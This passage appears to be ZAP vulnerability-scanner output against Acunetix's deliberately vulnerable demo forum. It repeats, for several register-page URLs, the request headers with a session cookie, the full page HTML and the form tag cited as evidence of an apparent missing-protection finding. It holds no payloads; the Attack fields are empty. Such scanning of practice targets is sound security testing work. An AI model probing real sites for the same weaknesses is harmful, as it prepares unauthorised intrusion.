Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=19 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:54 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=2 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:49 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=20 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:54 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=22 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=24 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=25 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:56 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here 